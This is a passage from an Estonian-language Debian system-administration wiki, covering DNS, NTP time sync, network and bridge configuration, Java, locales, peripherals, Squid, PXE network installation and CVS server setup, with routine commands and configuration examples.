Selleks, et arvuti lahendaks muid nimesid, peab olema kirjas nimeserveri aadress failis /etc/resolv.conf

nameserver 192.168.1.254

Kusjuures, kui failis /etc/resolv.conf kasutada mitut sellist rida erinevate nimeserverite aadressidega, siis proovitakse igal nimelahendusel neid järjest läbi kuni jõutakse esimese töötavani. Vaikimisi oodatakse vastust 5 sekundit. Täiendavat infot saab resolveri manuaalist öeldes

# man resolver

Tihtipeale kasutatakse keskkonnamuutujat PS1 prompti kujundamiseks ja mille väärtuse moodustamisel kasutatakse omakorda käsku hostname. Seetõttu muutub promptis oleva arvuti nime väärtus peale välja ja uuesti sisselogimist.

====resolvconf====

Lenny sisaldab lisaks nö staatilisele resolverile dünaamilist resolvconf tarkvara, asjakohane allikas on aadressil http://wiki.debian.org/NetworkConfiguration

Tarkvara paigaldamiseks tuleb öelda

# apt-get install resolvconf

Osa olulisi faile asub kataloogis

/etc/resolvconf

resolvconf oskab /etc/network/interfaces failist kasutada dns-nameservers parameetrit, nt selliselt

...
auto eth0
iface eth0 inet static
address 192.168.10.199
gateway 192.168.10.254
netmask 255.255.255.0
broadcast 192.168.10.255
dns-nameservers 192.168.10.254

===Kellaaeg===

Arvuti kellaaeg on korrektselt juhul kohalik aeg. See sõltub ajavööndi seadistusest, mis võiks Eestis olla

# ls -l /etc/localtime
lrwxrwxrwx 1 root root 34 Jul 15 21:40 /etc/localtime -> /usr/share/zoneinfo/Europe/Tallinn

Vajadusel tuleks eemaldada /etc/locatime ja öelda

# ln -s /usr/share/zoneinfo/Europe/Tallinn /etc/localtime

Seadistamiseks sobib kusjuures kasutada pigem ehk utiliiti dpkg-reconfigure öeldes

# dpkg-reconfigure tzdata

====Kellaaja esitamine ja seadistamine programmiga date====

Töötava süsteemi käest saab küsida aega öeldes

$ date
Sat Jan 8 14:07:25 EET 2011

Lisaks saab küsida nt nö kaks nädalat tagasi, sellest on vahel kasu nt varundamisega seotud skriptides

$ date -d "2 weeks ago"
Sat Dec 25 14:07:25 EET 2010

====Kellaaja esitamine ja seadistamine programmiga rdate====

Openrdate http://sourceforge.net/apps/mediawiki/openrdate on OpenBSD projekti rdate tarkvara port Linuxile. Tarkvara paigaldamiseks tuleb öelda

# apt-get install rdate

Kellaja ühekordne seadmine toimub öeldes

# rdate ajaserver.loomaaed.tartu.ee

rdate võimaldab suhelda kahte tüüpi ajaserveritega

* http://tools.ietf.org/html/rfc868 server - tavaliselt töötab inetd abil ja teenindab portidel 37/tcp või 37/udp
* http://tools.ietf.org/html/rfc2030 - tavaliselt töötab pordil 123/udp

rdate võtmetega saab juhtida, millist režiimi klient parasjagu kasutab, nt

$ rdate -4 -p -n ntp.ut.ee
Sat Jan 8 14:09:44 EET 2011

kus

* -4 - IPv4 protokoll
* -p - ainult küsida aega ja mitte seadistada
* -n kasutada rfc2030 ajaserverit

Vaikimisi pöördub rdate ajaserveri poole kasutades rfc686 protokolli ja 37/tcp porti.

====Kellaaja esitamine ja seadistamine programmiga ntpdate====

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ntpdate

ntpdate sobib kellaaja küsimiseks rfc2060 protokolli toetavalt serverilt (kasutades 123/udp porti) ning kohaliku süsteemi kellaaja seadmiseks. Ainult kellaaja küsimiseks sobib kasutada võtit -q

$ ntpdate -p 2 -q ntp.ut.ee ntp.aso.ee
server 2001:bb8:2002:500:211:25ff:fe8f:7d64, stratum 2, offset 0.011371, delay 0.10133
server 193.40.5.113, stratum 2, offset 0.000782, delay 0.03786
server 195.80.105.226, stratum 1, offset 0.000217, delay 0.03523
8 Jan 15:35:55 ntpdate[20870]: adjust time server 195.80.105.226 offset 0.000217 sec

kus

* -p 2 - igalt toodud ajaserverilt küsitakse aega kaks korda
* -q - aega ainult küsitakse ja ei seadistata
* vastust küsitakse kolmelt ajaserverilt kuna ntp.ut.ee nimel on A ja AAAA kirjed

Algupärane ntpdate programm ise ei kasuta ühtegi seadistusfaili, kuid Debian keskkonnas on lisaks programm ntpdate-debian, mida juhib seadistusfail /etc/default/ntpdate mille abil saab juhtida, milliseid ajaservereid kasutatakse. Vaikimisi on seadistatud rida

NTPDATE_USE_NTP_CONF=yes

mis tähendab, et kasutatakse ajaservereid ntp paketi tarkvara seadistusfailist /etc/ntp.conf. Kui ntpd programm töötab, siis ntpdate keeldub aega seadmast.

====Kellaaja esitamine ja seadistamine tarkvaraga ntp====

Kellaaja sünkronisseerimiseks sobib kasutada paketti ntp

# apt-get install ntp

NTP tarkvara juhivad kaks seadistusfaili

* /etc/default/ntp - milles sisaldub vaikimisi rida ja mis tähendab, et ntpd programmi käivitamisel seadistatakse kellaaeg nö kiiresti

NTPD_OPTS='-g'

* /etc/ntp.conf - seadistusfail, kus näidatakse ajaserverid jms parameetrid

Seadistusfailist /etc/ntp.conf tuleb leida read

server 0.debian.pool.ntp.org
server 1.debian.pool.ntp.org
server 2.debian.pool.ntp.org
server 3.debian.pool.ntp.org

ning soovi korral asendada need oma teenese pakkuja nime kasutava ühe reaga, nt

server ajaserver.loomaaed.tartu.ee

Kulub mõni aega, nt 10 minutit kuni ntp töötamine stabiliseerub, sellest annab tunnistust, et ntptrace vastab kus arvuti asub ntp hierarhias, nt midagi sellist

# ntptrace -n
127.0.0.1: stratum 3, offset -0.001927, synch distance 0.038145
192.168.30.8: stratum 2, offset -0.000066, synch distance 0.020106
192.168.30.15: stratum 1, offset 0.000010, synch distance 0.002270, refid 'GPS'

võib ka küsida sarnaselt (see väljund ei ole eelmisega näitega kooskõlas)

# ntpq -np
remote refid st t when poll reach delay offset jitter
==============================================================================
10.192.0.53 193.40.5.113 3 u 47 64 37 0.646 -22.260 73.828

====Kellaaja esitamine ja seadistamine tarkvaraga openntpd====

ntp tarkvarale on populaarne alternatiiv openntpd, üks praktiline erinevus on nt selles, et ntp sisaldab ntptrace utiliiti. OpenNTPD ei sisaldu Debian Squeeze paketihalduses.

====Märkused====

Selleks, et Xen domU kellaaega mõjutaks domU sees töötav ntp server tuleb öelda

bash# sysctl -w xen.independent_wallclock=1

või lisada faili /etc/sysctl.conf rida

xen.independent_wallclock=1

Leap sekundite käsitlemine toimub tavaliselt kahel võimalikul viisil

* lisatakse äkki sekund ära

# dmesg
..
[14255112.244045] Clock: inserting leap second 23:59:60 UTC

* määritakse sekundi lisandumine pikema perioodi peale

===Võrgu seadistamine seadistusfailidega===

Võrguseadmete seadistamine toimub faili /etc/networks/interfaces abil. Selle faili sisu alusel kehtestatakse võrguseadistused arvuti alglaadimisel või öeldes arvuti töötamisel

# /etc/init.d/networking restart

Failis saab kasutada sellised sektsioone

====lo ja eth võrguseadme seadistamine====

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.10.10
gateway 192.168.10.254
netmask 255.255.255.0

====dummy võrguseadme seadistamine====

auto dummy0
iface dummy0 inet static
address 192.168.13.251
netmask 255.255.255.0
network 192.168.13.0
broadcast 192.168.13.255

Kui on soov kasutada enam kui ühte dummy seadet, tuleb laadida dummy moodul sarnaselt

# modprobe dummy numdummies=5

VLAN kasutamist tutvustatakse punktis http://kuutorvaja.eenet.ee/wiki/VLAN_kasutamine#Linux.27i_kasutamine_mode_trunk_re.C5.BEiimis

===Silla kasutamine===

Silla (ingl. k. bridge) kasutamine toimub paketis bridge-utils utiliitidega, paigaldamiseks tuleb öelda

# apt-get install bridge-utils

Nt tekitame silla eth1 ja tap0 seadmetega

# brctl addbr br0
# brctl addif br0 eth1
# brctl addif br0 eth2

Silla omadusi saab küsida öeldes

# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.00064f320035 yes eth1
eth2

Silla kasutamiseks peavad olema seadmed üleval, nt silla üles tõstmiseks tuleb öelda

# brctl br0 up

Silla saab eemaldamiseks tuleb sild alla lasta, eemaldada seadmed ning lõpuks sild

# brctl br0 down
# brctl delif br0 eth1
# brctl delif br0 eth2
# brctl delbr br0

Sillale saab seadistada ka ip aadressi, nii nagu paljudele muudele võrguseadmetele

# ifconfig br0 192.168.1.200 netmask 255.255.255.0

Tulemusena paistab

# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:17:42:02:0b:8a
inet addr:192.168.1.250 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5c63:deff:fe92:e125/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38 errors:0 dropped:0 overruns:0 frame:0
TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2008 (1.9 KiB) TX bytes:3101 (3.0 KiB)

kusjuures bridge mac aadressina kasutatakse vaikimisi kõige väiksemat mac aadressi bridge külge ühendatud seadmetest, st see aadress võib muutuda bridge töötamise käigus. mac aadressi saab ka muuta, nt

# ifconfig br0 hw ether 70:01:68:00:12:50

STP (Spanning Tree Protocol) sisselülitamiseks tuleb öelda

# brctl stp br0 on

ja silla STP info esitamiseks

# brctl showstp br0
br0
bridge id 8000.00064f320035
designated root 8000.00064f320035
root port 0 path cost 0
max age 20.00 bridge max age 20.00
hello time 2.00 bridge hello time 2.00
forward delay 15.00 bridge forward delay 15.00
ageing time 300.01
hello timer 1.49 tcn timer 0.00
topology change timer 0.00 gc timer 5.49
flags

eth1 (1)
port id 8001 state disabled
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8001 forward delay timer 0.00
designated cost 0 hold timer 0.00
flags

eth2 (2)
port id 8002 state forwarding
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8002 forward delay timer 0.00
designated cost 0 hold timer 0.48
flags

kust on näha, et

* antud juhtumil on silla üks komponent välja lülitatud

Sillaga seotud mac aadresside esitamiseks tuleb öelda

# brctl showmacs br0
port no mac addr is local? ageing timer
2 00:06:4f:32:00:35 yes 0.00
1 00:06:4f:63:e3:d7 yes 0.00
2 00:0c:42:07:1a:45 no 0.04
2 00:16:3e:00:00:01 no 83.98
2 00:1c:c0:38:89:07 no 22.58
2 70:01:68:00:11:45 no 227.43
2 70:01:68:01:02:49 no 33.48

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Bridging_(networking)
* http://tldp.org/HOWTO/BRIDGE-STP-HOWTO/index.html
* http://en.wikipedia.org/wiki/Spanning_tree_protocol
* http://en.wikipedia.org/wiki/LAN_switching
* http://backreference.org/2010/07/28/linux-bridge-mac-addresses-and-dynamic-ports/

===Võrgu seadistamine programmiga ip===

Programm ip võimaldab Linuxi kaasaegsetes 2.4 ja 2.6 tuumades sisalduva võrguliideste toega oluliselt paindlikumalt ümber käia
kui ifconfig. Näited käsudest, mida on ohutu anda töötavas masinas.

====Seadmed====

# ip link show
1: lo: mtu 16436 qdisc noqueue
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:26 brd ff:ff:ff:ff:ff:ff

====Seadme aadressid====

Aadresside esitamine

# ip address show eth1
3: eth1: mtu 1500 qdisc pfifo_fast qlen 1000
link/ether 00:07:e9:0b:d3:d3 brd ff:ff:ff:ff:ff:ff
inet 10.0.6.5/24 brd 10.0.6.255 scope global eth1
inet 10.0.6.6/24 brd 10.0.6.255 scope global secondary eth1:1

====Ruuting====

Ruutingute esitamine

# ip route show
10.0.5.0/24 dev eth3 proto kernel scope link src 10.0.5.1
10.0.6.0/24 dev eth0 proto kernel scope link src 10.0.6.1
...

Ruutingu lisamine

# ip route add 192.168.10/24 dev eth0

Ruutingu eemaldamine

# ip route del default via 10.0.14.1 dev eth0

====Misc====

Näited kästudest, mida on ehk ohutu anda töötava masina kasutuses mitte olema võrguseadme suhtes

# ip addr add 100.100.100.4/16 dev eth4
# ip addr del 100.100.100.4/16 dev eth4

nn ifconfig'i aliased

Osade teadlaste arvates on see tänapäeval täiesti igand rääkida ethx:x aliastest. Et lihtsalt saab seadmele omistada mitu aadressi ja kogu lugu. Kui aga on juhtunud selline õnnetu lugu, et seadmel on nt eth0:1 aadress, siis saab seda eemaldada lihtsalt sedasi

# ip addr del 195.80.96.214 dev eth0

===Java kasutamine===

Java ehk JVM (Java Virtual Machine) tarkvara kasutamiseks on Debianis mitmeid võimalusi. Kui on kavatsus jääda paketihaldusest paigaldatud tarkvara kasutamise juurde, siis tõenäoliselt on otstarbekas lasta paketihaldusel töötada ja kasutada Debiani Java pakette. Kui aga kasutatakse mingit eraldiseisvat tarkvara, nt Tomcat, GlassFish vms Java rakendusserverit, siis on ehk otstarbekas kasutada http://java.sun.com/ veebikohast kopeeritud Javat.

====Java kasutamine paketihaldusest====

Debiani Lenny paketihalduses on olemas sellised Java kompilaatorit sisaldavad Java implementatsioonid

$ aptitude search "?provides(java-compiler)"
p gcj - The GNU Java compiler
p gcj-4.2 - The GNU compiler for Java(TM)
p gcj-4.3 - The GNU compiler for Java(TM)
p jikes-classpath - clean room standard Java libraries - wrapper for jikes
p jikes-kaffe - Wrapper for jikes using Kaffe classes
p kaffe-jthreads - A green threads enabled version of the Kaffe VM
p kaffe-pthreads - A POSIX threads enabled version of the Kaffe VM
p sun-java5-jdk - Sun Java(TM) Development Kit (JDK) 5.0
p sun-java6-jdk - Sun Java(TM) Development Kit (JDK) 6

Tarkvara paigaldatakse nagu ikka Debiani pakett ning kasutatakse nagu ikka Javat.

====Sun Java kasutamine====

Sun on Java autor ja üks oluline edasiarendaja, kuid on ka teisi Java implementatsioone. Sun Java saab kasutaja kopeerida aadressilt http://java.sun.com/ kus saab tutvuda ka Java kasutustingimustega.

Sun jagab Javat üsna erinevates pakendustes, kusjuures erinevus on kolmel nö teljel

* millisele funktsionaalsusele on orieteeritud - SE (Standard Edition), EE (Enterprise Edition), ME (Micro Edition)
* kas tegu on arendusvahendi või nö kasutusvahendiga - nt SDK (Software development kit) vs JRE (Java Runtime Environment), viimane sisaldub esimeses
* versiooninumber

Erinevad versioonid 2009 suve seisuga

* 1.3 - vana versioon, mida kasutavad ehk vaid mõned nö riistvaras javat sisaldavad seadmed
* 1.4 - mõned nö legacy rakendustega Tomcat rakendusserverid võiksid seda veel kasutada
* 5 (vahel nimetatakse 1.5) - täiesti veel kasutuses, mõnda rakendust soovitatakse kasutada sellel versioonil
* 6 (vahel nimetatakse 1.6) - viimane stabiilne versioon

Tundub, et juhtumil kui ei ole teada millist Javat kasutada, siis on sobiv valida SE SDK versioon 1.6, mille saab kopeerida http://java.sun.com/ veebikohast liikudes

Downloads -> Java SE -> Java SE Development Kit (JDK 6 Update 16) -> Download

ning täpsustada platvorm, nt

* Linux64 - 64 bit Linux
* Linux - 32 bit Linux

Seejärel valida nimekirjast .bin

File Description Name Size
Java SE Development Kit 6u16 jdk-6u16-linux-x64-rpm.bin 74.04 MB
Java SE Development Kit 6u16 jdk-6u16-linux-x64.bin 78.08 MB

Kasutamiseks tuleb otsustada, millises kataloogis JVM asuma hakkab, olgu see nt /usr/local/java6, selleks tuleb minna juurkasutajana kataloogi /usr/local

# cd /usr/local
# sh jdk-6u16-linux-x64.bin
vastata küsimustele jaatavalt
# ln -s /usr/local/tekkinud-katalooginimi /usr/local/java6

Java kasutamiseks tuleb seada ja kui peetakse vajalikuks, lisada teele

$ export JAVA_HOME=/usr/local/java6
$ export PATH=/usr/local/java6/bin:$PATH

Seejärel saab nt küsida Java versiooni öeldes

$ /usr/local/java6/bin/java -version
java version "1.6.0_16"
Java(TM) SE Runtime Environment (build 1.6.0_16-b01)
Java HotSpot(TM) 64-Bit Server VM (build 11.3-b02, mixed mode)

====Iceweaseli Java lisa====

Iceweaseli ehk Firefox 3.x versiooniga java kasutamiseks on i386 keskkonnas olemas plugin

# apt-get install sun-java5-plugin

või

# apt-get install sun-java6-plugin

===Lokaat===

Lokaatide kasutamiseks tuleb paigalda pakett locales

# apt-get install locales

ning edasiseks seadistamiseks saab öelda, asjakohased seadistusfailid on iseenesest /etc/environment ning /etc/default/locale

# dpkg-reconfigure locales

Süsteemi vaikelokaat võiks olla ehk C serverite puhul, aga see on kasutaja otsustada kuidas ta paremaks peab.

Lokaatide nimekirja esitamiseks tuleb öelda, nt selline võiks olla üsna tüüpiline tulemus

# locale -a
C
POSIX
et_EE.utf8

Kui seadistada lisaks nt ru_RU.utf8 ja fr_FR.utf8, siis saab lugeda vene ja prantsuse keelseid manuaale. Nt öeldes nö tavalises xtermis

$ export LANG=fr_FR.utf8
$ uxterm

mis paistab selline

[[Pilt:Os-debian-kasutamine-1.gif]]

Lisaks töötab nt w3m ja lynx uxterm aknas vene keeles.

===CD plaadi kirjutamine===

Niisama plaadile kirjutamiseks tuleb esmalt moodustada failidest tõmmis öeldes näiteks

# genisoimage -o ../tommis.iso .

ning seejärel kopeerida tõmmis plaadile öeldes

# cdrecord -v speed=10 dev=/dev/cdrom tommis.iso

Kui tegu on RW plaadiga, siis ennem järgmist kirjutamist tuleb plaat puhastada käsuga

# cdrecord -v dev=/dev/cdrom blank=fast

Squeeze puhul

# apt-get install wodim
# wodim -v speed=8 dev=/dev/sr0 tommis.iso

korduvkirjutatava plaadi kustutamiseks

# wodim -v dev=/dev/cdrom blank=fast

===Klaviatuuriasetus konsoolil===

Klaviatuuriasetuse muutmiseks tuleb öelda

# dpkg-reconfigure console-data

ning valida sobiv asetus. NB! Ka mac'i asetus on olemas.

===OpenSSL probleem===

2008 aasta kevadel ilmnes, et Debiani arendajad olid OpenSSL tarkvara pakendamisel tekitanud avalike võtmete genereerimist puudutavas osas vea, mille tõttu osa varasemalt Debian Etch abil tekitatud võtmeid ja sertifikaate on ärakasutatavad. Kas konkreetne sertifikaat on haavatav saab kontrollida programmiga openssl-vulnkey. Esmalt tuleb paigaldada Backportsidest pakett openssl-blacklist ning öelda

# cat sertifikaat.pem | openssl-vulnkey -
COMPROMISED: b3409bf40c63d0d8fc3e1625e9cac2076e20d1e7 -

===Helikaardi kastumine===

Kui helikaart on arvutisse füüsiliselt paigaldatud, siis vajadusel saab SoX tarkvara utiliitide abil kontrollida, kas heli salvestamine mikrofoni abil ja heli taasesitamine töötavad.

Sox tarkvara paigaldamiseks tuleb öelda

# apt-get install sox

Salvestamiseks sobib öelda

# rec -t .wav /tmp/failinimi.wav

Taasesitamiseks sobib öelda

# play /tmp/failinimi.wav

Lisaks on asjakohane kasutada mikserit, nt aumix või alsamixer, just mikrofoni sisselülitamiseks, käivitades xtermi aknas võiks paista selline pilt, vajadusel käivitamisel näidata seadme number, nt

# alsamixer -c 1

[[Pilt:Alsamixer-1.gif]]

kus

* F6 abil saab valida helikaarti, sh virtuaalset (PulseAudio)

===Digifotokaamera kasutamine===

Tänapäeval on levinud nn digitaalsed fotokaamerad, mida saab ühendada arvutiga USB liidese abil selleks, et kopeerida arvutisse fotoaparaadi flash diskile salvestatud pildid. Üks populaarne tarkvara, mis võimaldab suhelda fotokaameraga on gphoto2 http://gphoto.sourceforge.net/.

Tarkvara paigaldamiseks tuleb öelda

# apt-get install gphoto2

Graafiline nö pealisehitus gphoto2 tarkvarale on gtkam, mille paigaldamiseks tuleb öelda

# apt-get install gtkam

Piltide kopeerimiseks tuleb kaamera ühendada arvutiga ning lülitada piltide kopeerimise režiimile, operatsioonisüsteem peaks seejärel USB seadme ära tundma

# lsusb
...
Bus 001 Device 006: ID 04a9:309a Canon, Inc. PowerShot A80
Bus 001 Device 001: ID 0000:0000

Peale gtkam programmi käivitamist peaks gtkam suutma avastada kaamera ning esitama sarnase kasutajaliidese

[[Pilt:Gtkam-1.gif]]

gphoto2 programmi abil saab kaamerat otsekohesemalt juhtida, aga eeldusel, et gtkam või mõni muu programm seda ei kasuta. Nt saab küsida kaamera kohta kokkuvõtet öeldes

# gphoto2 --summary
Camera summary:
Model: Canon PowerShot A80
device version: 01.0001
serial number: (null)
Vendor extension ID: 0x0000000b
Vendor extension description: (null)
...

või kopeerida kõik failid kaamerast failisüsteemi käesolevasse kataloogi

# gphoto2 --get-all-files
Downloading 'IMG_3601.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3601.JPG
Downloading 'IMG_3602.JPG' from folder '/store_00010001/DCIM/236CANON'...
Saving file as IMG_3602.JPG
..

Android telefonist vms seadmest kopeerimisel on praktiline näidata kataloog, nt Google Nexus 5 nutitelefon puhul

$ gphoto2 --get-all-files -f /store_00010001/DCIM/Camera

Sony Xperia tahvelarvutiga

$ gphoto2 --get-all-files -f /store_00010001/DCIM/100ANDRO

Kui seadme ühendamise ta nö mountitakse, siis võib olla vajalik ta File Manager programmis vms kohal lahti lasta.

===SSH kasutamine===

Kui Debian on juhtumisi paigaldatud Networkless siis puudub vaikimisi openssh-server, selle paigaldamiseks tuleb öelda käsk

# apt-get install openssh-server

Mille järel starditakse server ka automaatselt, kasutaja mureks on vaid sisse logida.

Kui Debian Lenny ssh kliendiga sisselogimine teistesse süsteemidesse on muutunud rahulikuks (nt vana RedHat 4 ES või Solaris 10 ssh serverid oma default väärtustega) ning -v võtmega käivitatud klient ütleb muu seas

debug1: Authentications that can continue: gssapi-keyex,\
gssapi-with-mic,publickey,password,keyboard-interactive
debug1: Next authentication method: gssapi-keyex
debug1: No valid Key exchange context
debug1: Next authentication method: gssapi-with-mic
debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

debug1: Unspecified GSS failure. Minor code may provide more information
No credentials cache found

siis aitab kliendi seadistusfailis, nt /etc/ssh/ssh_config kasutada selliselt seadistatud parameetrit

GSSAPIAuthentication no

===Veebikaamera kasutamine===

Veebikaamera on väike videokaamera, mis tavaliselt ühendatakse arvutiga USB abil ning teda sobib kasutada nt Skype programmi juures enda visuaalseks reaalajas esitlemiseks.

Veebikaamera kasutamise ettevalmistamisel peab peale kaamera arvutiga ühendamist ilmuma USB seadmete nimekirja uus seade, midagi sellist

# lsusb
..
Bus 001 Device 003: ID 046d:092e Logitech, Inc. QuickCam Chat

Selle spca5xx chipsetiga Logitechi QuickCam Chat veebikaamera kasutamiseks tuleb paigaldada Lennile vastav draiver valides sobiva, st oma tuuma platvormile sobiva tuumamooduli, nt

# apt-get install gspca-modules-2.6-686

Lisaks peab see kasutaja, kelle alt Skype programm töötab kuuluma video gruppi, vajadusel tuleb redigeeerida /etc/group faili

# grep video /etc/group
video:x:44:kasutajanimi

Kui kasutaja määrati gruppi kuuluma, siis tuleb korraks süsteemist logida välja ja tagasi sisse, et gruppikuuluvus kehtestuks. Valides seejärel Skype programmi Options peaks olema kaamera kasutamise võimalus olemas

[[Pilt:Veebikaamera-1.gif]]

Veebikaamerat oskavad kasutada lisaks mitmed muud programmid, nt Cheese (gnome komponent), Gqcam.

===Mälukaartide kasutamine===

Nn mälukäärte esineb külluses, need mis ühendatakse arvutile külge USB liidese kaudu, kas otse või nö lugeja abil paistavad operatsioonisüsteemile tavaliselt SCSI seadmena. Seega, kasutamiseks tavaliselt piisab teha kindlaks dmesg väljundi lõpust millise nimega /dev/sdx seade on juurde tekkinud ning monteerida seejärel ta külge, nt

# mount /dev/sdc1 /mnt/malukaart

===Squid v. 3 kasutamine===

Lenny paketihaldusest saab paigaldada Squid v. 3 tarkvara öeldes

# apt-get install squid3

====Kasutamine kiirendina====

Squid3 kiirendina kasutamiseks sobib kasutada sellist seadistusfaili

cache_dir ufs /var/spool/squid3 768 16 256
http_port 10.0.6.249:80 defaultsite=www.siseministeerium.ee vhost
icp_port 0

cache_peer 10.0.6.95 parent 80 0 no-query originserver name=www100695 login=PASS
acl sites_www_100695 dstdomain src "/etc/squid3/sites_www100695.txt"
cache_peer_access www100695 allow sites_www_100695

cache_peer 10.0.6.96 parent 80 0 no-query originserver name=www100696 login=PASS
acl sites_www_100696 dstdomain src "/etc/squid3/sites_www100696.txt"
cache_peer_access www100696 allow sites_www_100696

acl all src 0.0.0.0/0.0.0.0
acl localhost src 127.0.0.1/255.255.255.255 10.0.0.0/255.255.255.0
acl Safe_ports port 80 # http

http_access deny !Safe_ports
http_access allow all

access_log /var/log/squid3/access.log squid
emulate_httpd_log on

===locate andmebaas===

Vaikimisi moodustab Debian updatedb programmi käivitamisel cron'ist nn locate andmebaasi, milles sisaduvad süsteemis leiduvate failid nimed. Seda andmebaasi saab kasutada nt selliselt

# locate .bash_history
/root/.bash_history
/srv/backup/500g-vint/home/mart/.bash_history

locate andmebaas võib osutuda mitmel juhul ebasoovitavaks

* andmebaasi salvestatakse andmed, mis seal ei peaks sisalduma; nt kui veebiserveri kasutajana saab käivitada programme, siis annab see baas ilmselt soovimatut lisainfot kasutajale ühe või teise faili olemasolust ja asukohast failisüsteemis
* locale andmebaasi moodustatakse väga suure mahuga andmetest iga päev uuesti ning see raiskab ilmselt ressurssi

updatedb programm käivitatakse skripti

/etc/cron.daily/mlocate

abil ning updatedb tööd saab kontrollida seadistusfaili abil, eriti, milliseid katalooge andmebaasi koostamisel kasutatakse

/etc/updatedb.conf

===Operatsioonisüsteemi paigaldamine võrgust===

Operatsioonisüsteemi võrgust paigaldamine eeldab arusaadavalt paigaldamise ajal võrguühenduse olemasolu, soovitavalt nö hea ühenduse olemasolu. Debian Lenny operatsioonisüsteemi saab paigaldada võrgust kolmel viisil

* business card CD tõmmis (ca 40 MB) - sisaldab tuuma ja installerit
* minimaalse sisu CD tõmmis (ca 180 MB) - sisaldab tuuma, installerit ning minimaalset hulka pakette
* TFTP serverilt paigaldamine - tuuma ja ramdisk booditakse TFTP serverilt

Vaatamata sellele kui palju kasutati kohalikku abi, st lokaalset meediat või TFTP serverit toimub süsteemi mahukama osa moodustava tarkvara kopeerimine paigaldamise ajal võrgust.

Võrgust paigaldamine võiks eriti sobida üle IBM IMM ja HP iLO liideste tarvkara paigaldamisel.

====Paigaldamine TFTP serverilt====

Üks võimalus Debiani paigaldada on täiesti ilma lokaalse meediate st võrgust, kuid eeldusel, et arvuti omab PXE võimelist võrgukaarti.

Selleks tuleb kopeerida aadressilt tftp serveris kasutamiseks ettevalmistatud kataloogi sisu

# wget -np -r http://ftp.nl.debian.org/debian/dists/lenny/main/installer-i386/current/images/netboot/debian-installer/i386/

ning paigutada lokaalvõrgus asuvasse tftp serverisse, nt kataloogi /tftpbood

# find /tftpboot
/tftpboot
/tftpboot/debian-installer
/tftpboot/debian-installer/i386
/tftpboot/debian-installer/i386/boot-screens
/tftpboot/debian-installer/i386/boot-screens/exithelp.cfg
/tftpboot/debian-installer/i386/boot-screens/adtxt.cfg
/tftpboot/debian-installer/i386/boot-screens/index.html
/tftpboot/debian-installer/i386/boot-screens/f1.txt
/tftpboot/debian-installer/i386/boot-screens/f10.txt
/tftpboot/debian-installer/i386/boot-screens/f2.txt
/tftpboot/debian-installer/i386/boot-screens/f3.txt
/tftpboot/debian-installer/i386/boot-screens/f4.txt
/tftpboot/debian-installer/i386/boot-screens/f5.txt
/tftpboot/debian-installer/i386/boot-screens/f6.txt
/tftpboot/debian-installer/i386/boot-screens/f7.txt
/tftpboot/debian-installer/i386/boot-screens/f8.txt
/tftpboot/debian-installer/i386/boot-screens/f9.txt
/tftpboot/debian-installer/i386/boot-screens/syslinux.cfg
/tftpboot/debian-installer/i386/boot-screens/menu.cfg
/tftpboot/debian-installer/i386/boot-screens/prompt.cfg
/tftpboot/debian-installer/i386/boot-screens/splash.png
/tftpboot/debian-installer/i386/boot-screens/stdmenu.cfg
/tftpboot/debian-installer/i386/boot-screens/vesamenu.c32
/tftpboot/debian-installer/i386/boot-screens/txt.cfg
/tftpboot/debian-installer/i386/index.html
/tftpboot/debian-installer/i386/initrd.gz
/tftpboot/debian-installer/i386/linux
/tftpboot/pxelinux.0
/tftpboot/pxelinux.cfg
/tftpboot/pxelinux.cfg/index.html
/tftpboot/pxelinux.cfg/default

Lisaks tuleb valmistada ette sobivalt dchp server, nt sellise host kirjeldusega, next-server 192.168.1.254 on tftpd server

host fuji.auul {
hardware ethernet 00:17:42:02:0b:8a;
fixed-address 192.168.1.142;
option broadcast-address 192.168.1.255;
option routers 192.168.1.254;
filename "pxelinux.0";
next-server 192.168.1.254;
option domain-name-servers 192.168.1.254;
}

Tulemusena peab installeeritav arvuti saama dhcp serverilt omale võrguseaded, alglaadima tftp serverilt operatsioonisüsteemi ning käivitama installeri. Edasine paigaldamine toimub tavapärasel viisil, kusjuures installer küsib Debiani peegel-serveri asukohta, millelt kopeeritakse tarkvara.

===CVS tarkvara kasutamine===

CVS tarkvara saab kasutada mitmel moel, antud juhul on tegemist selliste asjaoludega

* CVS töötab nn pserver rezhiimis, mis tähendab, et teenus kuulab 2401 pordil ja liiklus on krüptimata
* CVS liiklust tuleb täiendavate CVS väliste vahenditega turvata, nt OpenVPN või Stunnel
* CVS tarkvara tegeleb ise oma kasutajatega, st operatsioonisüsteemi kasutajatest eraldi
* saab kasutada mitmeid hoidlaid (ingl. k. repository)
* failisüsteemi kasutamine hoidla operatsioonisüsteemi seisukohalt toimub iga hoidla puhul hoidlale vastava kasutajaga (mitte hoidlat kasutava cvs kasutajana)

Antud juhul kasutatakse mitmeid Debiani haldajate poolt nn vanilla CVS tarkvarale juurde lisatud täiendusi, mille kasutamist on kirjeldatud failis /usr/share/doc/cvs/README.Debian.gz.

Paigaldamiseks tuleb öelda

# apt-get install cvs

ning valida kas kasutatakse pserverit või mitte, antud juhul kasutatakse ja seejuures tuleb järgnevalt määrata, millistes kataloogides asuvad repositooriumid, nt

/srv/cvs-loomaaed
/srv/cvs-propaganda

CVS tarkvara juhivad serveri poolel sellised seadistusfaili

* CVS p-serveri seadistusfailis /etc/cvs-pserver.conf sisalduvad muu seas repositooriumide asukohad failisüsteemis ning kasutate paroolifail

CVS_PSERV_REPOS="/data/cvs-loomaaed:/data/cvs-propaganda"
CVS_PSERV_LIMIT_MEM=hard
CVS_PSERV_LIMIT_DATA=hard
CVS_PSERV_LIMIT_CORE=0
